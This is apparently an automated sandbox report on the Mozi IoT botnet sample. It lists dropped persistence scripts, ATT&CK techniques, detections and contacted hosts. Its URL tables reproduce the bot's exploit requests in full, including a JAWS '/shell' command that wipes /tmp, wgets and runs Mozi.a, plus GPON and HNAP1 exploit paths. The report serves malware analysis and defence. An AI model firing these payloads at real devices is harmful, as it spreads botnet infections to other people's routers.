                Source: submitted sampleStderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705qemu: Unsupported ARM syscall: 0x4ace97qemu: uncaught target signal 4 (Illegal instruction) - core dumpedUnsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Drops files in suspicious directoriesShow sources
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/S95baby.shJump to dropped file
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/mountall.shJump to dropped file
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/checkfs.shJump to dropped file
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/umountnfs.shJump to dropped file
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/mountkernfs.shJump to dropped file
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/checkroot-bootclean.shJump to dropped file
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/mountnfs-bootclean.shJump to dropped file
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/bootmisc.shJump to dropped file
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/checkroot.shJump to dropped file
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/hwclock.shJump to dropped file
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/hostname.shJump to dropped file
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/mountdevsubfs.shJump to dropped file
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/mountall-bootclean.shJump to dropped file
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/mountnfs.shJump to dropped file
                Source: /tmp/Mozi.m (PID: 4580)File: /usr/bin/gettext.shJump to dropped file
                Source: /tmp/Mozi.m (PID: 4580)File: /usr/sbin/alsa-info.shJump to dropped file
                Uses known network protocols on non-standard portsShow sources
                Source: unknownNetwork traffic detected: HTTP traffic on port 34926 -> 49152
                Source: unknownNetwork traffic detected: HTTP traffic on port 49152 -> 34926
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40718 -> 8443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: /tmp/Mozi.m (PID: 4564)Queries kernel information via 'uname':
                Source: /tmp/Mozi.m (PID: 4580)Queries kernel information via 'uname':
                Source: /tmp/Mozi.m (PID: 4603)Queries kernel information via 'uname':
                Source: /sbin/modprobe (PID: 4622)Queries kernel information via 'uname':
                Source: /usr/share/apport/apport-gtk (PID: 4823)Queries kernel information via 'uname':
                Source: /usr/share/apport/apport-gtk (PID: 4866)Queries kernel information via 'uname':
                Source: kvm-test-1-run.sh.6.drBinary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
                Source: functions.sh0.6.drBinary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
                Source: kvm-test-1-run.sh.6.drBinary or memory string: kill -KILL $qemu_pid
                Source: functions.sh0.6.drBinary or memory string: qemu-system-ppc64)
                Source: kvm-test-1-run.sh.6.drBinary or memory string: echo Monitoring qemu job at pid $qemu_pid
                Source: kvm.sh.6.drBinary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
                Source: kvm-test-1-run.sh.6.drBinary or memory string: qemu_pid=$!
                Source: kvm-test-1-run.sh.6.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
                Source: functions.sh0.6.drBinary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
                Source: kvm-recheck-lock.sh.6.drBinary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
                Source: kvm-test-1-run.sh.6.drBinary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
                Source: kvm-test-1-run.sh.6.drBinary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
                Source: functions.sh0.6.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
                Source: kvm.sh.6.drBinary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
                Source: functions.sh0.6.drBinary or memory string: identify_qemu_append () {
                Source: kvm-test-1-run.sh.6.drBinary or memory string: echo Grace period for qemu job at pid $qemu_pid
                Source: functions.sh0.6.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
                Source: kvm-test-1-run.sh.6.drBinary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
                Source: functions.sh0.6.drBinary or memory string: # Returns our best guess as to which qemu command is appropriate for
                Source: kvm.sh.6.drBinary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
                Source: kvm-test-1-run.sh.6.drBinary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
                Source: kvm-test-1-run.sh.6.drBinary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
                Source: functions.sh0.6.drBinary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
                Source: functions.sh0.6.drBinary or memory string: identify_qemu_args () {
                Source: kvm-test-1-run.sh.6.drBinary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
                Source: functions.sh0.6.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
                Source: kvm-test-1-run.sh.6.drBinary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
                Source: kvm-test-1-run.sh.6.drBinary or memory string: # Generate -smp qemu argument.
                Source: kvm-test-1-run.sh.6.drBinary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
                Source: functions.sh0.6.drBinary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
                Source: functions.sh0.6.drBinary or memory string: # Output arguments for the qemu "-append" string based on CPU type
                Source: kvm.sh.6.drBinary or memory string: --qemu-args|--qemu-arg)
                Source: kvm.sh.6.drBinary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
                Source: functions.sh0.6.drBinary or memory string: echo $TORTURE_QEMU_CMD
                Source: kvm.sh.6.drBinary or memory string: TORTURE_QEMU_MAC=$2
                Source: kvm.sh.6.drBinary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
                Source: kvm-test-1-run.sh.6.drBinary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
                Source: functions.sh0.6.drBinary or memory string: specify_qemu_cpus () {
                Source: kvm-test-1-run.sh.6.drBinary or memory string: vcpus=`identify_qemu_vcpus`
                Source: functions.sh0.6.drBinary or memory string: echo qemu-system-ppc64
                Source: functions.sh0.6.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
                Source: kvm.sh.6.drBinary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
                Source: functions.sh0.6.drBinary or memory string: qemu-system-ppc64)
                Source: functions.sh0.6.drBinary or memory string: # identify_boot_image qemu-cmd
                Source: kvm.sh.6.drBinary or memory string: TORTURE_QEMU_ARG="$2"
                Source: kvm-recheck-rcu.sh.6.drBinary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
                Source: functions.sh0.6.drBinary or memory string: # identify_qemu_append qemu-cmd
                Source: functions.sh0.6.drBinary or memory string: identify_qemu_vcpus () {
                Source: functions.sh0.6.drBinary or memory string: # qemu-args already contains "-smp".
                Source: kvm-test-1-run.sh.6.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
                Source: functions.sh0.6.drBinary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
                Source: functions.sh0.6.drBinary or memory string: echo Cannot figure out what qemu command to use! 1>&2
                Source: functions.sh0.6.drBinary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
                Source: functions.sh0.6.drBinary or memory string: # identify_qemu_vcpus
                Source: kvm.sh.6.drBinary or memory string: TORTURE_QEMU_CMD="$2"
                Source: functions.sh0.6.drBinary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
                Source: functions.sh0.6.drBinary or memory string: # identify_qemu_args qemu-cmd serial-file
                Source: functions.sh0.6.drBinary or memory string: if test -n "$TORTURE_QEMU_CMD"
                Source: kvm.sh.6.drBinary or memory string: --qemu-cmd)
                Source: kvm.sh.6.drBinary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
                Source: kvm-test-1-run.sh.6.drBinary or memory string: qemu_args=$5
                Source: kvm-test-1-run.sh.6.drBinary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
                Source: kvm-test-1-run.sh.6.drBinary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
                Source: kvm-test-1-run.sh.6.drBinary or memory string: # Generate qemu -append arguments
                Source: functions.sh0.6.drBinary or memory string: # identify_qemu builddir
                Source: functions.sh0.6.drBinary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
                Source: kvm-test-1-run.sh.6.drBinary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
                Source: functions.sh0.6.drBinary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
                Source: kvm.sh.6.drBinary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
                Source: functions.sh0.6.drBinary or memory string: echo qemu-system-i386
                Source: functions.sh0.6.drBinary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
                Source: functions.sh0.6.drBinary or memory string: echo qemu-system-x86_64
                Source: functions.sh0.6.drBinary or memory string: identify_qemu () {

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsCommand and Scripting Interpreter1.bash_profile and .bashrc1.bash_profile and .bashrc1Masquerading1OS Credential Dumping1Security Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Standard Port11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScripting12At (Linux)1At (Linux)1File and Directory Permissions Modification1Brute Force1Remote System Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)1Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerSystem Network Configuration Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol5Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol5SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 336612 Sample: Mozi.m Startdate: 06/01/2021 Architecture: LINUX Score: 100 91 94.218.155.42, 80 VODANETInternationalIP-BackboneofVodafoneDE Germany 2->91 93 220.77.193.240, 14165, 5353 KIXS-AS-KRKoreaTelecomKR Korea Republic of 2->93 95 103 other IPs or domains 2->95 99 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->99 101 Antivirus detection for dropped file 2->101 103 Antivirus / Scanner detection for submitted sample 2->103 105 7 other signatures 2->105 12 Mozi.m 2->12         started        14 upstart sh 2->14         started        16 upstart sh 2->16         started        18 upstart sh 2->18         started        signatures3 process4 process5 20 Mozi.m 12->20         started        22 sh date 14->22         started        24 sh apport-checkreports 14->24         started        26 sh date 16->26         started        28 sh apport-gtk 16->28         started        30 sh date 18->30         started        32 sh apport-gtk 18->32         started        process6 34 Mozi.m 20->34         started        file7 83 /usr/sbin/alsa-info.sh, ASCII 34->83 dropped 85 /usr/networks, ELF 34->85 dropped 87 /usr/bin/gettext.sh, ASCII 34->87 dropped 89 21 other malicious files 34->89 dropped 107 Sample tries to persist itself using /etc/profile 34->107 109 Drops files in suspicious directories 34->109 111 Sample reads /proc/mounts (often used for finding a writable filesystem) 34->111 113 Sample tries to persist itself using System V runlevels 34->113 38 Mozi.m 34->38         started        41 Mozi.m sh 34->41         started        43 Mozi.m sh 34->43         started        45 30 other processes 34->45 signatures8 process9 signatures10 119 Opens /proc/net/* files useful for finding connected devices and routers 38->119 47 Mozi.m sh 38->47         started        49 Mozi.m sh 38->49         started        51 Mozi.m sh 38->51         started        62 5 other processes 38->62 53 sh killall 41->53         started        56 sh iptables 43->56         started        58 sh iptables 45->58         started        60 sh iptables 45->60         started        64 21 other processes 45->64 process11 signatures12 66 sh iptables 47->66         started        69 sh iptables 49->69         started        71 sh iptables 51->71         started        115 Terminates several processes with shell command 'killall' 53->115 117 Executes the "iptables" command to insert, remove and/or manipulate rules 56->117 73 sh iptables 62->73         started        75 sh iptables 62->75         started        77 sh iptables 62->77         started        79 2 other processes 62->79 process13 signatures14 97 Executes the "iptables" command to insert, remove and/or manipulate rules 66->97 81 iptables modprobe 66->81         started        process15

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Mozi.m70%VirustotalBrowse
                Mozi.m69%ReversingLabsLinux.Trojan.Mirai
                Mozi.m100%AviraLINUX/Mirai.lldau

                Dropped Files

                SourceDetectionScannerLabelLink
                /usr/networks100%AviraLINUX/Mirai.lldau
                /usr/networks69%ReversingLabsLinux.Trojan.Mirai

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://pastebin.ca)0%Avira URL Cloudsafe
                http://107.170.200.206:80/HNAP1/0%Avira URL Cloudsafe
                http://54.164.156.191:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://%s:%d/bin.sh;chmod0%Avira URL Cloudsafe
                http://%s:%d/Mozi.a;chmod0%Avira URL Cloudsafe
                http://127.0.0.1:80/GponForm/diag_Form?images/0%Avira URL Cloudsafe
                http://127.0.0.1:8080/GponForm/diag_Form?images/0%Avira URL Cloudsafe
                http://%s:%d/Mozi.m;$0%Avira URL Cloudsafe
                http://23.44.146.105:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://192.155.170.244:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://14.250.195.170:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                http://127.0.0.10%Avira URL Cloudsafe
                http://www.alsa-project.org0%Avira URL Cloudsafe
                http://%s:%d/Mozi.m0%Avira URL Cloudsafe
                http://www.alsa-project.org/cardinfo-db/0%Avira URL Cloudsafe
                http://45.196.102.179:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://127.0.0.1sendcmd0%Avira URL Cloudsafe
                http://23.218.46.16:80/HNAP1/0%Avira URL Cloudsafe
                http://206.212.1.199:80/HNAP1/0%Avira URL Cloudsafe
                http://184.31.173.81:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://104.98.58.115:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://203.146.142.202:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://%s:%d/Mozi.m;/tmp/Mozi.m0%Avira URL Cloudsafe
                http://%s:%d/bin.sh0%Avira URL Cloudsafe
                http://purenetworks.com/HNAP1/0%Avira URL Cloudsafe
                http://www.alsa-project.org/alsa-info.sh0%Avira URL Cloudsafe
                http://%s:%d/Mozi.m;0%Avira URL Cloudsafe
                http://www.alsa-project.org.0%Avira URL Cloudsafe
                http://HTTP/1.10%Avira URL Cloudsafe
                http://%s:%d/Mozi.a;sh$0%Avira URL Cloudsafe
                http://34.117.168.156:80/HNAP1/0%Avira URL Cloudsafe
                http://38.87.83.34:80/HNAP1/0%Avira URL Cloudsafe
                http://51.178.69.101:80/HNAP1/0%Avira URL Cloudsafe
                http://23.218.148.138:80/HNAP1/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                dht.transmissionbt.com
                		87.98.162.88
                		truefalse
                  		high
                  bttracker.acc.umu.se
                  		130.239.18.159
                  		truefalse
                    		high
                    router.bittorrent.com
                    		67.215.246.10
                    		truefalse
                      		high
                      router.utorrent.com
                      		82.221.103.244
                      		truefalse
                        		high
                        bttracker.debian.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://107.170.200.206:80/HNAP1/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://54.164.156.191:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://127.0.0.1:80/GponForm/diag_Form?images/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://127.0.0.1:8080/GponForm/diag_Form?images/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://23.44.146.105:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://192.155.170.244:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://14.250.195.170:49152/soap.cgi?service=WANIPConn1false
                          • Avira URL Cloud: safe
                          		unknown
                          http://45.196.102.179:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://23.218.46.16:80/HNAP1/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://206.212.1.199:80/HNAP1/false
                          • Avira URL Cloud: safe
                          		unknown
                          http://184.31.173.81:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://104.98.58.115:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://203.146.142.202:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://34.117.168.156:80/HNAP1/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://38.87.83.34:80/HNAP1/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://51.178.69.101:80/HNAP1/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://23.218.148.138:80/HNAP1/true
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://pastebin.ca)alsa-info.sh0.6.drfalse
                          • Avira URL Cloud: safe
                          		low
                          http://%s:%d/bin.sh;chmodMozi.mtrue
                          • Avira URL Cloud: safe
                          		low
                          http://%s:%d/Mozi.a;chmodMozi.mfalse
                          • Avira URL Cloud: safe
                          		low
                          http://schemas.xmlsoap.org/soap/encoding/Mozi.mfalse
                            		high
                            http://%s:%d/Mozi.m;$Mozi.mtrue
                            • Avira URL Cloud: safe
                            		low
                            http://schemas.xmlsoap.org/soap/envelope/Mozi.mfalse
                              		high
                              http://127.0.0.1Mozi.mfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://baidu.com/%s/%s/%d/%s/%s/%s/%s)Mozi.mfalse
                                		high
                                http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/.config.6.drfalse
                                  		high
                                  http://www.alsa-project.orgalsa-info.sh0.6.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.pastebin.ca/upload.phpalsa-info.sh0.6.drfalse
                                    		high
                                    http://%s:%d/Mozi.mMozi.mtrue
                                    • Avira URL Cloud: safe
                                    		low
                                    http://www.alsa-project.org/cardinfo-db/alsa-info.sh0.6.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://127.0.0.1sendcmdMozi.mfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEYalsa-info.sh0.6.drfalse
                                      		high
                                      http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblahalsa-info.sh0.6.drfalse
                                        		high
                                        http://ipinfo.io/ipMozi.mfalse
                                          		high
                                          http://%s:%d/Mozi.m;/tmp/Mozi.mMozi.mtrue
                                          • Avira URL Cloud: safe
                                          		low
                                          http://%s:%d/bin.shMozi.mtrue
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.pastebin.caalsa-info.sh0.6.drfalse
                                            		high
                                            http://purenetworks.com/HNAP1/Mozi.mfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.alsa-project.org/alsa-info.shalsa-info.sh0.6.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://%s:%d/Mozi.m;Mozi.mtrue
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.alsa-project.org.alsa-info.sh0.6.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://HTTP/1.1Mozi.mfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://%s:%d/Mozi.a;sh$Mozi.mfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.pastebin.ca.alsa-info.sh0.6.drfalse
                                              		high
                                              http://schemas.xmlsoap.org/soap/envelope//Mozi.mfalse
                                                		high

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                220.77.193.240
                                                		unknownKorea Republic of
                                                		4766KIXS-AS-KRKoreaTelecomKRtrue
                                                5.166.73.219
                                                		unknownRussian Federation
                                                		50512BARNAUL-ASRUfalse
                                                40.130.183.40
                                                		unknownUnited States
                                                		7029WINDSTREAMUSfalse
                                                72.159.64.151
                                                		unknownUnited States
                                                		6389BELLSOUTH-NET-BLKUSfalse
                                                185.154.41.162
                                                		unknownAustria
                                                		1853ACONETACOnetBackboneATfalse
                                                23.11.95.110
                                                		unknownUnited States
                                                		16625AKAMAI-ASUSfalse
                                                19.215.174.22
                                                		unknownUnited States
                                                		3MIT-GATEWAYSUSfalse
                                                158.225.192.80
                                                		unknownGermany
                                                		702UUNETUSfalse
                                                186.51.139.183
                                                		unknownUruguay
                                                		6057AdministracionNacionaldeTelecomunicacionesUYfalse
                                                95.43.183.235
                                                		unknownBulgaria
                                                		8866BTC-ASBULGARIABGfalse
                                                176.102.9.236
                                                		unknownUkraine
                                                		196767INMART1-ASUAfalse
                                                170.169.46.241
                                                		unknownMexico
                                                		2134GSVNET-ASGSVirtualNetworkProdubanESfalse
                                                28.165.107.6
                                                		unknownUnited States
                                                		7922COMCAST-7922USfalse
                                                99.184.167.96
                                                		unknownUnited States
                                                		7018ATT-INTERNET4USfalse
                                                117.47.222.71
                                                		unknownThailand
                                                		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                58.19.104.190
                                                		unknownChina
                                                		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                99.13.185.86
                                                		unknownUnited States
                                                		7018ATT-INTERNET4USfalse
                                                207.53.210.155
                                                		unknownUnited States
                                                		7055QISUSfalse
                                                141.41.40.120
                                                		unknownGermany
                                                		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                                                13.71.214.153
                                                		unknownUnited States
                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                143.109.130.79
                                                		unknownUnited States
                                                		2381WISCNET1-ASUSfalse
                                                161.133.111.129
                                                		unknownUnited States
                                                		7018ATT-INTERNET4USfalse
                                                126.165.206.91
                                                		unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                                                187.91.94.164
                                                		unknownBrazil
                                                		26599TELEFONICABRASILSABRfalse
                                                191.192.107.140
                                                		unknownBrazil
                                                		26599TELEFONICABRASILSABRfalse
                                                204.91.96.177
                                                		unknownUnited States
                                                		2828XO-AS15USfalse
                                                200.44.135.0
                                                		unknownVenezuela
                                                		8048CANTVServiciosVenezuelaVEfalse
                                                155.151.158.228
                                                		unknownUnited States
                                                		523DNIC-AS-00523USfalse
                                                155.105.12.11
                                                		unknownSwitzerland
                                                		559SWITCHPeeringrequestspeeringswitchchEUfalse
                                                33.201.125.252
                                                		unknownUnited States
                                                		2686ATGS-MMD-ASUSfalse
                                                27.32.17.46
                                                		unknownAustralia
                                                		7545TPG-INTERNET-APTPGTelecomLimitedAUfalse
                                                32.162.242.238
                                                		unknownUnited States
                                                		2686ATGS-MMD-ASUSfalse
                                                212.60.225.210
                                                		unknownGermany
                                                		20676PLUSNETDEfalse
                                                146.159.102.16
                                                		unknownSwitzerland
                                                		49071SWISSTXTSchweizerischeTeletextAGCHfalse
                                                123.232.159.36
                                                		unknownChina
                                                		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                148.165.10.222
                                                		unknownUnited States
                                                		3356LEVEL3USfalse
                                                62.162.153.81
                                                		unknownMacedonia
                                                		6821MT-AS-OWNbulOrceNikolovbbMKfalse
                                                94.218.155.42
                                                		unknownGermany
                                                		3209VODANETInternationalIP-BackboneofVodafoneDEtrue
                                                202.227.33.60
                                                		unknownJapan4725ODNSoftBankMobileCorpJPfalse
                                                122.57.213.95
                                                		unknownNew Zealand
                                                		4771SPARKNZSparkNewZealandTradingLtdNZfalse
                                                198.150.168.4
                                                		unknownUnited States
                                                		2381WISCNET1-ASUSfalse
                                                71.129.56.39
                                                		unknownUnited States
                                                		7018ATT-INTERNET4USfalse
                                                129.9.60.164
                                                		unknownUnited States
                                                		14852DCXUSfalse
                                                153.10.223.14
                                                		unknownUnited States
                                                		22063UNASSIGNEDfalse
                                                201.248.155.210
                                                		unknownVenezuela
                                                		8048CANTVServiciosVenezuelaVEfalse
                                                186.85.54.171
                                                		unknownColombia
                                                		10620TelmexColombiaSACOfalse
                                                220.42.145.217
                                                		unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                                                108.225.201.127
                                                		unknownUnited States
                                                		7018ATT-INTERNET4USfalse
                                                29.127.165.200
                                                		unknownUnited States
                                                		7922COMCAST-7922USfalse
                                                95.104.92.175
                                                		unknownGeorgia
                                                		16010MAGTICOMASCaucasus-OnlineGEfalse
                                                23.14.79.151
                                                		unknownUnited States
                                                		12956TELEFONICATELXIUSESfalse
                                                27.9.246.216
                                                		unknownChina
                                                		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                53.1.41.196
                                                		unknownGermany
